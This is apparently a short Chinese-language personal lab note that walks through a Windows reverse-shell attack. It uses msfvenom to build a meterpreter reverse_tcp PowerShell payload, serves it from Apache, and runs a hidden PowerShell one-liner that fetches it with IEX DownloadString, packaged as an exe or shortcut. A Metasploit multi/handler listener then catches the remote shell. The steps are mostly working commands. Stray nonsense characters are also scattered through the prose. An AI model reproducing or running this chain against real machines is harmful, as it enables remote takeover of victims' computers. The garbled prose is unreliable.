該漏洞以存在一段時間刺下,由于能力問題一直未對該漏洞利用方式進(jìn)行測試,今天學(xué)過程中記錄一下測試流程族操。
- 確認(rèn)系統(tǒng)是否存在該漏洞
- 使用msfvenom 生成反彈shell停忿,shell生成方式如下:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.16.203.1 LPORT=5555 -f psh-reflection >test.ps1
- 將生成文件放到apache網(wǎng)站根目錄
sudo cp test.ps1 /var/www/html/
- 啟用apache服務(wù)
sudo service apache2 start
啟動服務(wù)后通過curl方式測試是否正常訪問
- 在靶機上啟用powershell鏈接
powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://.../sonar.ps1');xx.ps1" 保存為exe文件。
- 在攻擊端監(jiān)聽反彈
metasploit做以下相關(guān)配置:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST ...
msf exploit(handler) > set LPORT ****
msf exploit(handler) > run
- 在被攻擊端運行創(chuàng)建快捷鍵
- msf獲取到遠(yuǎn)程shell
僅作自己測試可婶,請勿違規(guī)使用沿癞。